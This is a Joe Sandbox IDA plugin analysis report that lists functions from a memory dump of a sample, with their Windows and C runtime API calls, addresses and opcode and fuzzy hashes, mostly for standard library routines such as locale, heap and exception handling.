Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::
String ID:
API String ID: 3936482309-0
Opcode ID: 691c63f11937bc60e3da1d556036812ff35f9fd7d50910e0ee82f1fa42e7805d
Instruction ID: 14fc361dd3ef566bf35296fb3f686e2335101f09ed599b817981c4c0cb59bf03
Opcode Fuzzy Hash: 691c63f11937bc60e3da1d556036812ff35f9fd7d50910e0ee82f1fa42e7805d
Instruction Fuzzy Hash: 3B312BB4A0021A9FDB04DF98C991BAEB7B1FF89704F108659E9167B381C771A901CB91

Function 00ED3620 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00ED365A

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::
String ID:
API String ID: 3936482309-0
Opcode ID: df22f475bc3cb3fbc7395f9acc0a20f8ed354dd32a9ed6a550bc51785ceaa355
Instruction ID: ac82b5b2b4466d2b6596fdc3c6823024b6580e40a985ca323c5e76762102d435
Opcode Fuzzy Hash: df22f475bc3cb3fbc7395f9acc0a20f8ed354dd32a9ed6a550bc51785ceaa355
Instruction Fuzzy Hash: 00312DB4A0021ADFDB04DF98C991BBFB7B2FF89704F108659E5166B392C771A901CB91

Function 00EEACA0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00EEACDA

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: a681453d6941c669fdd643c6cda93c42f2b4fd86118f5cb583ad69dce55ae5f3
Instruction ID: 3a98dfcd1cf44be7b5e8b2f8e94160c8128a945f8836a80369164b910bdd48fb
Opcode Fuzzy Hash: a681453d6941c669fdd643c6cda93c42f2b4fd86118f5cb583ad69dce55ae5f3
Instruction Fuzzy Hash: 51111571A0420AAFCB05DF59E941A9B7BF5EF48308F1540A9F809AB251E631EE11CB65

Function 00ED9C52 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

stdext::threads::lock_error::lock_error.LIBCPMTD ref: 00EDA2F3

Part of subcall function 00EDB0A3: RaiseException.KERNEL32(E06D7363,00000001,00000003,00ED141C,?,?,?,00ED141C,?,00F05DBC), ref: 00EDB103

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ExceptionRaisestdext::threads::lock_error::lock_error
String ID:
API String ID: 3447279179-0
Opcode ID: 77a7d9749c74cb82edae29d4ed8423bd5db84b69eb0197b46e040aa535c7a0a6
Instruction ID: 0d1432829c5196af35a8f48f25efc84d35f13ee3623153dfc495b59491b2030d
Opcode Fuzzy Hash: 77a7d9749c74cb82edae29d4ed8423bd5db84b69eb0197b46e040aa535c7a0a6
Instruction Fuzzy Hash: 7EF0243880060CF6CB00BAB5EC0ADDEB3ECDA00310B601123B924B56E2EB70D64685D2

Function 00ED8890 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

allocator.LIBCONCRTD ref: 00ED88C5

Part of subcall function 00ED89D0: _Allocate.LIBCONCRTD ref: 00ED89E4

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Allocateallocator
String ID:
API String ID: 40054573-0
Opcode ID: 6e45e69e3226e455510d1fc968e43a19ec70c87ca408ccc417ab80709b3d44ea
Instruction ID: 3f515d26141e4f2e5fefb50cf12595205c1d58ffc48a5346158012d90d3701d9
Opcode Fuzzy Hash: 6e45e69e3226e455510d1fc968e43a19ec70c87ca408ccc417ab80709b3d44ea
Instruction Fuzzy Hash: 610184B4E00209EFCB04DF98D5919AEBBF1EF89304F2081A9E809A7355D730AA51CB94

Function 00EE824E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00EEE6D6,00000000,?,00EEE6D6,00000220,?,?,00000000), ref: 00EE8280

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b14451340d68ef9ec4710c8cb5105b9cafb58307e1b31b734b65223d0c4f13bb
Instruction ID: 185481163ba111f81a441155c2a79505015d8a99ea57a149197e5ebc86459890
Opcode Fuzzy Hash: b14451340d68ef9ec4710c8cb5105b9cafb58307e1b31b734b65223d0c4f13bb
Instruction Fuzzy Hash: 58E0E531601A9D6ADF7026A75E00B9B3B8C9F4A3A0F192211EE48B20F1CF20CC0082E0

Non-executed Functions

Function 00EF21B9 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00EF23D0

Strings

1#INF, xrefs: 00EF22EF
1#SNAN, xrefs: 00EF22C5
1#QNAN, xrefs: 00EF22CC
1#IND, xrefs: 00EF22BE

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d6dc0bfc17699d8a8f8ceac9c902e15f85897c5a85cfe5a3b074950e63bcf790
Instruction ID: bc020001171c49ee3dc16bd5b500bf37613e218b8a4c7c39d4fbe44694040f05
Opcode Fuzzy Hash: d6dc0bfc17699d8a8f8ceac9c902e15f85897c5a85cfe5a3b074950e63bcf790
Instruction Fuzzy Hash: 8CD20672E0862D8BDB65CE28CD407EAB7B5EB44305F1451EAD60DF7240EB78AE858F41

Function 00EF12DF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00EF1378
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00EF13A1
GetACP.KERNEL32 ref: 00EF13B6

Strings

OCP, xrefs: 00EF1333
ACP, xrefs: 00EF12FD

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: bf386d89757db9f23f63fc33c3fd930ad7d19252b3eb8288fd18edb4d6dea5a2
Instruction ID: 86817e0e347d5ca2e4d432176270cb73c5281fa2fa0742995c9c9a82121af271
Opcode Fuzzy Hash: bf386d89757db9f23f63fc33c3fd930ad7d19252b3eb8288fd18edb4d6dea5a2
Instruction Fuzzy Hash: DD21922270210DEADB349B14C901ABB73A7AB94B58B5755A4EB0AF7900F732DD41C350

Function 00EF14BB Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5

GetUserDefaultLCID.KERNEL32 ref: 00EF15C3
IsValidCodePage.KERNEL32(00000000), ref: 00EF1601
IsValidLocale.KERNEL32(?,00000001), ref: 00EF1614
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00EF165C
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00EF1677

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 757fca77b1e5bcfa4361e1f6d848c6b1308737ca17a2da7f29a0e796c7823164
Instruction ID: 6f7a5aa8584e258b59f96a6af8953eb14fb4c1976c6a06a3df22287ca72c9df8
Opcode Fuzzy Hash: 757fca77b1e5bcfa4361e1f6d848c6b1308737ca17a2da7f29a0e796c7823164
Instruction Fuzzy Hash: 46516A72A0020DEFDF10EFA5CC41ABA77F8AF48704F1955A9EA15FB190EB709904CB61

Function 00EE1E80 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a0e38ba20bd8e180b811d2703fbebb8ddc6f9a9a33c4cff84b8e53218f21aa
Instruction ID: 9ce3e7db8518830a457646461a9cb964b7b9724431eccaa2d3095cd665ebdbae
Opcode Fuzzy Hash: 31a0e38ba20bd8e180b811d2703fbebb8ddc6f9a9a33c4cff84b8e53218f21aa
Instruction Fuzzy Hash: 45022A71E012599BDF14CFA9C8806AEBBF5FF48314F24926DE619B7380D771AA41CB90

Function 00EEDEE2 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00EEDFD2
FindNextFileW.KERNEL32(00000000,?), ref: 00EEE0C6
FindClose.KERNEL32(00000000), ref: 00EEE105
FindClose.KERNEL32(00000000), ref: 00EEE138

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: f7be413c32b10d5d77361bf470f8acb6f8a31dbea050650fe0d88790ffd5ce58
Instruction ID: d83ab35b066e3409615360500129e326f57a3ce71fe0c260cc5fa70092658777
Opcode Fuzzy Hash: f7be413c32b10d5d77361bf470f8acb6f8a31dbea050650fe0d88790ffd5ce58
Instruction Fuzzy Hash: 5871E17190919C9EDF20EF269C89AFABBB9AB05304F1461D9E04DB7251EA308E859F50

Function 00EDA417 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EDA423
IsDebuggerPresent.KERNEL32 ref: 00EDA4EF
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EDA50F
UnhandledExceptionFilter.KERNEL32(?), ref: 00EDA519

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 37a41484a84c635d6072dada67b19ab70a407971891d87035f62b74a210a8514
Instruction ID: 508bf0cd3a09470b10e4c8d07faeb80d08bbd87c4a13a7b293e50fcd063b5cc3
Opcode Fuzzy Hash: 37a41484a84c635d6072dada67b19ab70a407971891d87035f62b74a210a8514
Instruction Fuzzy Hash: 42310675D41218DBDB10DFA4D989BCDBBB8EF08304F1040AAE50CAB250EB709B89CF05

Function 00EF0F63 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EF0FB7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EF1001
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EF10C7

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 7598ea1e3cd5a319e246162cb7f07ea053b7f9749b4ce9cb6a1bfee1062cbfa9
Instruction ID: 86f5c52d6697fa547c11e57c43cb4cb5edfa718ad3689f2a3e33599859e11878
Opcode Fuzzy Hash: 7598ea1e3cd5a319e246162cb7f07ea053b7f9749b4ce9cb6a1bfee1062cbfa9
Instruction Fuzzy Hash: 1861DE7190120FDFEB289F28CD92BBA77A8EF14304F1051B9EA15E6685FB74D991CB10

Function 00EE1021 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00ED112E), ref: 00EE1119
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00ED112E), ref: 00EE1123
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00ED112E), ref: 00EE1130

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cb8e56eeca979682a3b3231f6e78e1a55eb844f68d5741b8c89d8b4a1bffc3bd
Instruction ID: c2a66b36e4d55d5e9e325792a776d76c9db1e72bad9d029d3df94702b3d199d9
Opcode Fuzzy Hash: cb8e56eeca979682a3b3231f6e78e1a55eb844f68d5741b8c89d8b4a1bffc3bd
Instruction Fuzzy Hash: AE31C27490122CABCF21DF25D989B9DBBB8BF08710F5051EAE51CA6260EB709F85CF45

Function 00EEBBE7 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EEBBE2,?,?,00000008,?,?,00EF4ECA,00000000), ref: 00EEBE14

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: e0ee08b9f3a1258131092f5e996473b02f211038d467fdc5f5f0f515fe181607
Instruction ID: 8beb236ef4324ce3415551c7dc5eb1034f4a47ccbde4956fed9fafa68a4be91d
Opcode Fuzzy Hash: e0ee08b9f3a1258131092f5e996473b02f211038d467fdc5f5f0f515fe181607
Instruction Fuzzy Hash: 08B18D3121064DCFD719CF29C48ABA67BE0FF04368F299658E999DF2A1C335E981CB40

Function 00EDA685 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EDA69B

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 4cdb24cfda05d581195cc33ca2cec21795a348caa5a991a9d1a116acfbd7617d
Instruction ID: 048f8c3c4a3970c2b1984b586268f6cdb213852a3ef33c9f2486879882c63030
Opcode Fuzzy Hash: 4cdb24cfda05d581195cc33ca2cec21795a348caa5a991a9d1a116acfbd7617d
Instruction Fuzzy Hash: 8D5189B1D056098FDB29CFA5E8853AABBF1FB04314F18856BC445EB350D774AE02CB51

Function 00EF11B6 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EF120A

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 0394534f95c488e36e2433d0e9d000d3f9e89d13619eac66d882f6c1769db125
Instruction ID: 50b2d7c56bb8705b8b0235540d7f4a61397c1b266a2073096681f9fcb613fc5a
Opcode Fuzzy Hash: 0394534f95c488e36e2433d0e9d000d3f9e89d13619eac66d882f6c1769db125
Instruction Fuzzy Hash: 8421D33261420EABEF189B65DC41ABB33E8EF45318F1020BAFE01E6151EB35ED049750

Function 00EDFC34 Relevance: 1.6, Strings: 1, Instructions: 333COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00EDFDA4

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 53fc89e0f23fc064f9aa056bf584d7fcf65298c4efc33ee41c171cefc7d6d7b1
Instruction ID: 89873e0a05e9164e1262057d5ea2647504c9d6d0f1a0f0ddfaf0afbb8caa315f
Opcode Fuzzy Hash: 53fc89e0f23fc064f9aa056bf584d7fcf65298c4efc33ee41c171cefc7d6d7b1
Instruction Fuzzy Hash: CDC1B33050064A8ECB24CF68C5847BAB7B2EF06318F24662BD857BB792D371AD47CB50

Function 00EF0E3D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5

EnumSystemLocalesW.KERNEL32(00EF0F63,00000001), ref: 00EF0EAF

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: dba272f3ebb5d24feb449031a0bfd24f1c150efa75f226c9023b2ab4c5c93634
Instruction ID: bdf74e3e74000ac6fc0fa58fab35e23c15ffda6d70619ccb8b7b055aa1ec5f3f
Opcode Fuzzy Hash: dba272f3ebb5d24feb449031a0bfd24f1c150efa75f226c9023b2ab4c5c93634
Instruction Fuzzy Hash: D2114C376043099FDF289F39C8A167AB791FF84358B14482CEA8797A41D3717802C740

Function 00EF13E5 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00EF117F,00000000,00000000,?), ref: 00EF1411

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
